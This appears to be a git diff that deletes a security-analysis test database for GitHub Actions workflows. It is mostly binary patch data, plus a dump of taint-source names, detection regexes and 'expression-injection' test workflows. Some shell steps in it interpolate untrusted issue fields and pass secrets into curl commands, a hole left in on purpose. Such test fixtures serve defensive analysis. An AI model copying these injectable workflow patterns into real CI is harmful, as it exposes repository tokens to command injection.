zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi diff --git a/db/db-yaml/default/pools/poolInfo b/db/db-yaml/default/pools/poolInfo deleted file mode 100644 index df3045a1ff5f4f01ad1cca4e97dbff096c69683a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 32 acmZQz00Sl<$;iOKv<5;$1SjTkivs`;zX8+$ 
diff --git a/db/db-yaml/default/sourceLocationPrefix.rel b/db/db-yaml/default/sourceLocationPrefix.rel deleted file mode 100644 index fde1ac19d2b083530bcab4cb4fd2dcaa285234ab..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4 LcmZQzU|3lW!zSrk$os%~sBO;^f z^{@6k&ubQk4`)ww^AgAPyqQ!+<^t4j=p&ftQRe(WeMgO;zM;OCePGC`7&3WYZ|0@K zjc2DUIFYlPL*@o(Pl(sFq=Iuv?=r`oI?D5I6>pQ||))Un8v6}{Q ziTa!UC^%P`+x0=s|nS^WPXh)f|s{PvvYinJ__f)tVZyAiSh`i|v{jhpp zX&s{QWra2DEJJF^7{@$Jhu65Pyt(qVc;jD4h6RCzk%L&fh@c!~O5)_>Z9 z2)!FQFXH))N(|0VRvXE#03N9Je^7TS+8gF`zt$hXD(4A>Yd>I&CblS#VbU-s3%Ij& zKt>SVM`h0t+>f45@$T+srDa#x^##qJnS8{K5q5Jszp-jiUp z;#)y&0S}^ff%D=mN;jtloIU@-y)MH`(mxWP^~ARSs`iGcJAM~FtqNL-eo#D(L{Egi zOFZR7YpHV7x>ubcK9x{eJgBv!9hEQPwSJt2riYgbTLfUL9_zwloihypUfFP+&KL8eR${U`(ruD ze;MYXfW7``Tg7*O(fHv;QP;o~M88Y_PH;k%mmh8-^S^liQX!v$Ylz>_-%^*Dzobs6 z{bcZ;!WDuWNL{C1U_M3J(*&?y?O5LQaSmUIy#o%X{Tg?{yC3fydVO`@K5g>BAHzN5 z!#_;MGQ}rn&PAo+j_&Zkh*m<~rR=_NF6=5%lBm6B;nK-GP^e?IOaOPxz zFDf{iiT?ft-$(JUFmKZaAH3M%YO^!Z;nKsIvxWMaIwP~;5|~dc&mh^Wsoofy)ynvr zQvIlvEcA%Q(wQ)xcX>yz2yb{x_S-u-@!1=#c9)1=i~c0FmMS4!a(XKH%^lQ^$lf;5 zOv@u=W93T;H^Z94^!Sn!#^U{~JXyrJN^yR>=XpzRgpTS>em=uJL-iuBjCeOPXBON{ z?RS7r!91R7C-<)eUkG^1SlOK~o%M((BUzt2dBxdUO%;o{{h(o@WEFEVUFSOW#%v0^ zzM#34+LXAy%>O73BNl)xAZROJslC^s{5?Z z_U8e|oE@vRX0I!Co;v4~@qxpYWU&!hs~z6tWu}J8J-5M+;~8xPPL6>4qt(#wHsx)D zbWzF8MH>Xy75uZ(T=<3a#+?{mR$O6s!I`r%KP&#@;CNJH>L<#a8{GdG{c6+{`YDaJ zT&St?=2_C;hhISMRJHOC_>P(_{K^7)D%n?*7f;^TO_85~cdOs|k<#YFzo;}Ng}{R$ zQ_L_j273L;nJZZvoy?@nX{nUdV)gE(%=0L7;ws+E$Ao_moKUdg|L=KPvKpw&>k8Za zcD&~jwHacT=mnVw~P$Pva zOpim|Q63$?5N{^xl8_m|Ex;4#L1z>~9HqBaxSm?-3Vxn@2P<94UYUS5Sx-Aa`vA{L zYmz=!-7ydD9(x_A9pH8Jg47zy?>q|mJM{rnEjG9zY%AE3|ZHOL2 zzQdSK2(whOCgJa^^6Ww}xPo?2eGNDnyCew$v$0_g)}x1Yl&RP$9l4b^Pm8~mQnguAAGo3{N2qNz%? 
diff --git a/db/db-yaml/default/strings/0/metadata/page-000000 b/db/db-yaml/default/strings/0/metadata/page-000000 deleted file mode 100644 index cb4291b6b3b65463c7b9660f099668c0cfc4fe35..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16384 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 Bc#Z%7 diff --git a/db/db-yaml/default/strings/0/pageDump/page-000000000 b/db/db-yaml/default/strings/0/pageDump/page-000000000 deleted file mode 100644 index eec9231ab07..00000000000 --- a/db/db-yaml/default/strings/0/pageDump/page-000000000 +++ /dev/null 
@@ -1,2 +0,0 @@ -tag:yaml.org,2002:(.*)mapstrboolseqintworkflow_call\$\{\{\s*[A-Za-z0-9_\[\]\*\(\)\.\-]+\s*\}\}octo-org/source-repo/.github/workflows/workflow.yml*output.workflow-outputFooahmadnassri/action-changed-filesoutput.filesPR changed filesoutput.jsondorny/paths-filteroutput.changesfranzdiebold/github-env-vars-actionoutput.CI_PR_DESCRIPTIONPR bodyoutput.CI_PR_TITLEPR titlejitterbit/get-changed-filesoutput.alloutput.addedoutput.modifiedoutput.removedoutput.renamedoutput.added_modifiedoutput.deletedkhan/pull-request-comment-triggeroutput.comment_bodypull_request_commenttj-actions/branch-namesoutput.current_branchPR current branchoutput.head_ref_branchPR head branchoutput.ref_branchBranch tirggering workflow runtj-actions/changed-filesoutput.added_filesoutput.copied_filesoutput.deleted_filesoutput.modified_filesoutput.renamed_filesoutput.all_old_new_renamed_filesoutput.type_changed_files${{ steps.changed-files.outputs.all_changed_files }}${{ secrets.DYNAMOBOTTOKEN }}${{ github.event.issue.url }}${{ github.actor }}${{ env.template }}${{ env.acceptable_missing_info }}${{ secrets.GITHUB_TOKEN }}${{env.comment_intro}}${{env.close_issue_comment}}${{env.info_needed}}${{env.issue_label}}${{env.needs_more_info_comment}}${{env.specific_info}}${{env.analysis_response}}${{env.greetings_comment}}${{ env.issue_json_string }}${{ github.repository }}${{github.event.after}}${{ env.ISSUE_BODY_PARSED }}${{env.user_name}}${{env.auto_branch}}${{env.destination_branch}}${{env.pr_message}}${{ github.event.discussion.title }}${{ github.event.discussion.body }}${{ github.event.pages[1].title }}${{ github.event.pages[11].title }}${{ github.event.pages[0].page_name }}${{ github.event.pages[2222].page_name }}${{ toJSON(github.event.pages.*.title) }}${{ steps.trim-url.outputs.trimmed_url }}${{needs.job1.outputs.job_output}}${{ env.global_env }}${{ env.test }}${{ env.job_env }}${{ env.step_env }}\$\{\{\s*([A-Za-z0-9_\[\]\*\((\)\.\-]+)\s*\}\}${{ matrix.language 
}}${{steps.no-step.outputs.foo}}github.event.comment.bodyinputs.who-to-greet${{ github.event.pull_request.title }}${{ github.event.pull_request.body }}${{ github.event.pull_request.head.label }}${{ github.event.pull_request.head.repo.default_branch }}${{ github.event.pull_request.head.repo.description }}${{ github.event.pull_request.head.repo.homepage }}${{ github.event.pull_request.head.ref }}${{ github.event.review.body }}output.unmerged_filesoutput.unknown_filesoutput.all_changed_and_modified_filesoutput.all_changed_filesoutput.other_changed_filesoutput.all_modified_filesoutput.other_modified_filesoutput.other_deleted_filesoutput.modified_keysoutput.changed_keystj-actions/verify-changed-filesoutput.changed-filestzkhan/pr-update-actionoutput.headMatchxt0rted/slash-command-actionoutput.command-arguments${{ github.head_ref }}${{ github.event.commits[11].message }}${{ github.event.commits[11].author.email }}${{ github.event.commits[11].author.name }}${{ github.event.head_commit.author.email }}${{ github.event.head_commit.author.name }}${{ github.event.head_commit.committer.email }}${{ github.event.head_commit.committer.name }}${{ github.event.commits[11].committer.email }}${{ github.event.commits[11].committer.name }}${{steps.summary.outputs.value}}${{steps.summary.outputs.foo}}${{ steps.source.outputs.all_changed_files_count }}${{ github.event.workflow_run.display_title }}${{ github.event.workflow_run.head_commit.message }}${{ github.event.workflow_run.head_commit.author.email }}${{ github.event.workflow_run.head_commit.author.name }}${{ github.event.workflow_run.head_commit.committer.email }}${{ github.event.workflow_run.head_commit.committer.name }}${{ github.event.workflow_run.head_branch }}${{ github.event.workflow_run.head_repository.description 
}}github.event.issue.titleenv.ISSUE_TITLEsteps.remove_quotations.outputs.replacedsteps.changed-files.outputs.all_changed_filesgithub.event.issue.bodyenv.content_analysis_responsesecrets.DYNAMOBOTTOKENgithub.event.issue.urlgithub.actorenv.ISSUE_BODYenv.templateenv.acceptable_missing_infosecrets.GITHUB_TOKENenv.comment_introenv.close_issue_commentenv.info_neededenv.issue_labelenv.needs_more_info_commentenv.specific_infoenv.analysis_responseenv.greetings_commentsteps.remove_quotes.outputs.replacedgithub.event.issue.numberenv.issue_json_stringsecrets.DYNAMO_ISSUES_TOKENgithub.repositorygithub.event.aftergithub.event.commits[0].messageenv.ISSUE_BODY_PARSEDenv.user_nameenv.auto_branchenv.destination_branchenv.pr_messagegithub.event.discussion.titlegithub.event.discussion.bodygithub.event.pages[1].titlegithub.event.pages[11].titlegithub.event.pages[0].page_namegithub.event.pages[2222].page_nametoJSON(github.event.pages.*.title)steps.extract-url.outputs.initial_urlsteps.curl.outputs.redirected_urlsteps.trim-url.outputs.trimmed_urlsteps.step.outputs.valuesteps.source.outputs.all_changed_filesalways()needs.job1.outputs.job_outputenv.global_envenv.testenv.job_envenv.step_envsteps.set-matrix.outputs.all_changed_filesfromJSON(needs.create-matrix.outputs.matrix)matrix.languagegithub.event.head_commit.messagesteps.no-step.outputs.foogithub.event.pull_request.titlegithub.event.pull_request.bodygithub.event.pull_request.head.labelgithub.event.pull_request.head.repo.default_branchgithub.event.pull_request.head.repo.descriptiongithub.event.pull_request.head.repo.homepagegithub.event.pull_request.head.refgithub.event.review.bodygithub.head_refgithub.event.commits[11].messagegithub.event.commits[11].author.emailgithub.event.commits[11].author.namegithub.event.head_commit.author.emailgithub.event.head_commit.author.namegithub.event.head_commit.committer.emailgithub.event.head_commit.committer.namegithub.event.commits[11].committer.emailgithub.event.commits[11].committer.namesteps.summary
.outputs.valuesteps.summary.outputs.foosteps.source.outputs.all_changed_files_countsteps.step2.outputs.teststeps.step0.outputs.valuesteps.step1.outputs.MSGgithub.event.workflow_run.display_titlegithub.event.workflow_run.head_commit.messagegithub.event.workflow_run.head_commit.author.emailgithub.event.workflow_run.head_commit.author.namegithub.event.workflow_run.head_commit.committer.emailgithub.event.workflow_run.head_commit.committer.namegithub.event.workflow_run.head_branchgithub.event.workflow_run.head_repository.descriptionmerge.*/(([^/]*?)(?:\.([^.]*))?)argus_case_study.ymlargus_case_studyymlchanged-files.ymlcomment_issue.ymlcomment_issuecomment_issue_newline.ymlcomment_issue_newlinecross1.ymlcross1cross2.ymlcross2cross3.ymlcross3discussion.ymldiscussion_comment.ymlgollum.ymlimage_link_generator.ymlimage_link_generatorinter-job.ymlinter-jobissues.yamlyamlmatrix.ymlno-flow1.ymlno-flow1no-flow2.ymlno-flow2pull_request_review.ymlpull_request_review_comment.ymlpull_request_target.ymlpush.ymlsimple1.ymlsimple2.ymlsimple2test.ymlworkflow_run.ymlaction.ymlaction([^/]+)/([^/@]+)@(.+)v2frabertreplace-string-action1.2v4tj-actionsv40github-scriptv3actions-ecosystemaction-regex-matchv2.5setup-dotnetv1.2mad9000actions-find-and-replace-string3([^/]+)/([^/]+)/([^@]+)@(.+)actions/checkoutfrabert/replace-string-actionactions/github-scriptactions-ecosystem/action-regex-matchactions/setup-dotnetmad9000/actions-find-and-replace-string\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*commi
tter\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*message\b\bgithub\s*\.\s*head_ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*body\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*title\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*label\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*homepage\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*default_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*display_title\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_repository\b\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*email\bexit name: Issue Workflowexit name: CIexit on: issue_commentexit name: I ... edicterexit name: Cherry pickingexit on: discussionexit on: dis ... commentexit on: gollumexit name: I ... cessingexit on: pushexit on: issuesexit name: " ... nguage"exit on: pul ... _reviewexit on: pul ... commentexit on: pul ... _targetexit on:exit name: 'test'exit name: 'Hello World'enter name: Issue Workflowenter name: CIenter on: issue_commententer name: I ... edicterenter name: Cherry pickingenter on: discussionenter on: dis ... commententer on: gollumenter name: I ... cessingenter on: pushenter on: issuesenter name: " ... nguage"enter on: pul ... 
_reviewenter on: pul ... commententer on: pul ... _targetenter on:enter name: 'test'enter name: 'Hello World'exit name: Issue Workflow (normal)exit name: CI (normal)exit on: issue_comment (normal)exit name: I ... edicter (normal)exit name: Cherry picking (normal)exit on: discussion (normal)exit on: dis ... comment (normal)exit on: gollum (normal)exit name: I ... cessing (normal)exit on: push (normal)exit on: issues (normal)exit name: " ... nguage" (normal)exit on: pul ... _review (normal)exit on: pul ... comment (normal)exit on: pul ... _target (normal)exit on: (normal)exit name: 'test' (normal)exit name: 'Hello World' (normal)input testocto-org/sink-repo/.github/workflows/workflow.ymlinput.config-pathexpression-injectionconfig-path.github/workflows/argus_case_study.yml.github/workflows.github.github/workflows/changed-files.yml.github/workflows/comment_issue.yml.github/workflows/comment_issue_newline.yml.github/workflows/cross1.yml.github/workflows/cross2.yml.github/workflows/cross3.yml.github/workflows/discussion.yml.github/workflows/discussion_comment.yml.github/workflows/gollum.yml.github/workflows/image_link_generator.yml.github/workflows/inter-job.yml.github/workflows/issues.yaml.github/workflows/matrix.yml.github/workflows/no-flow1.yml.github/workflows/no-flow2.yml.github/workflows/pull_request_review.yml.github/workflows/pull_request_review_comment.yml.github/workflows/pull_request_target.yml.github/workflows/push.yml.github/workflows/simple1.yml.github/workflows/simple2.yml.github/workflows/test.yml.github/workflows/workflow_run.ymlaction1/action.ymlaction1action2/action.ymlaction2action.yaml\bsteps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\binputs\.([A-Za-z0-9_-]+)\b\bneeds\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9
_-]+)\)toJSON\(inputs\.([A-Za-z0-9_-]+)\)fromJSON\(inputs\.([A-Za-z0-9_-]+)\)\bgithub\.event\.inputs\.([A-Za-z0-9_-]+)\btoJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)fromJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)\bjobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\bmatrix\.([A-Za-z0-9_-]+)\btoJSON\(matrix\.([A-Za-z0-9_-]+)\)fromJSON\(matrix\.([A-Za-z0-9_-]+)\)\benv\.([A-Za-z0-9_-]+)\btoJSON\(env\.([A-Za-z0-9_-]+)\)fromJSON\(env\.([A-Za-z0-9_-]+)\)Job: redirectIssueJob: changed_filesJob: echo-chamberJob: echo-chamber2Job: echo-chamber3Job: checkIssueInformationJob: issue_type_PredicterJob: cherry_pickJob: process-image-urlJob: job1Job: job2Job: create-matrixJob: analyzeJob: simple1Job outputs nodeUses StepRun StepRun Step: check-infoRun Step: extract-urlRun Step: curlRun Step: trim-urlRun Step: sinkRun Step: no-stepRun Step: flowRun Step: no-flowRun Step: step1Run Step: step2Uses Step: remove_quotationsUses Step: changed-filesUses Step: regex-matchUses Step: remove_quotesUses Step: sourceUses Step: stepUses Step: set-matrixUses Step: summaryUses Step: 
step0octo-org/this-repo/.github/workflows/workflow.ymltaintocto-org/summary-repo/.github/workflows/workflow.ymlakhileshns/heroku-deployinput.branchoutput.statusandroid-actions/setup-androidinput.cmdline-tools-versionoutput.ANDROID_COMMANDLINE_TOOLS_VERSIONapple-actions/import-codesign-certsinput.keychain-passwordoutput.keychain-passwordashley-taylor/read-json-property-actioninput.jsonoutput.valueashley-taylor/regex-property-actioninput.replacementinput.valueaszc/change-string-case-actioninput.stringoutput.capitalizedinput.replace-withoutput.uppercaseoutput.lowercaseaws-actions/configure-aws-credentialsinput.aws-access-key-idenv.AWS_ACCESS_KEY_IDsecret.AWS_ACCESS_KEY_IDinput.aws-secret-access-keyenv.AWS_SECRET_ACCESS_KEYsecret.AWS_SECRET_ACCESS_KEYinput.aws-session-tokenenv.AWS_SESSION_TOKENsecret.AWS_SESSION_TOKENbobheadxi/deploymentsinput.envoutput.envbufbuild/buf-breaking-actioninput.buf_tokenenv.BUF_TOKENbufbuild/buf-lint-actioncachix/cachix-actioninput.signingKeyenv.CACHIX_SIGNING_KEYcoursier/cache-actioninput.pathenv.COURSIER_CACHEcrazy-max/ghaction-import-gpginput.fingerprintoutput.fingerprintcsexton/release-asset-actioninput.release-urloutput.urldelaguardo/setup-clojureinput.bootenv.BOOT_VERSIONoutput.replacedgame-ci/unity-test-runnerinput.artifactsPathoutput.artifactsPathgetsentry/action-releaseinput.versionoutput.versioninput.version_prefixgithub/codeql-actioninput.outputoutput.sarif-outputgradle/gradle-build-actioninput.cache-encryption-keyenv.GRADLE_ENCRYPTION_KEYinput.build-scan-terms-of-service-agreeenv.BUILD_SCAN_TERMS_OF_SERVICE_AGREEinput.build-scan-terms-of-service-urlenv.BUILD_SCAN_TERMS_OF_SERVICE_URLhaya14busa/action-condinput.if_trueinput.if_falsehexlet/project-actioninput.mount-pathenv.PWDjsdaniell/create-jsoninput.nameoutput.successfullyinput.dirjwalton/gh-ecr-pushinput.imageoutput.imageUrllarsoner/circleci-artifacts-redirector-actioninput.artifact-pathinput.sourceinput.replacemattdavis0351/actionsinput.image-nameinput.tagmetro-digital/setup-t
ools-for-waasinput.gcp_sa_keyenv.GCLOUD_PROJECTmishakav/pytest-coverage-commentinput.multiple-filesoutput.summaryReportmymindstorm/setup-emsdkinput.actions-cache-folderenv.EMSDKruby/setup-rubyinput.ruby-versionoutput.ruby-prefixsalsify/action-detect-and-tag-new-versioninput.tag-templateoutput.tagshallwefootball/upload-s3-actioninput.destination_diroutput.object_keyshogo82148/actions-setup-perlinput.working-directoryenv.PERL5LIBsuisei-cn/actions-download-fileinput.filenameoutput.filenametimheuer/base64-to-fileinput.fileNameoutput.filePathinput.fileDirbranchcmdline-tools-versionkeychain-passwordjsonreplacementaws-access-key-idaws-secret-access-keyaws-session-tokenbuf_tokensigningKeyfingerprintrelease-urlbootartifactsPathversionversion_prefixoutputcache-encryption-keybuild-scan-terms-of-service-agreebuild-scan-terms-of-service-urlif_trueif_falsemount-pathdirartifact-pathimage-nametaggcp_sa_keymultiple-filesactions-cache-folderruby-versiontag-templatedestination_dirworking-directoryfilenamefileNamefileDir -echo "Bad Issue Title Format"exit 1echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labelsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url 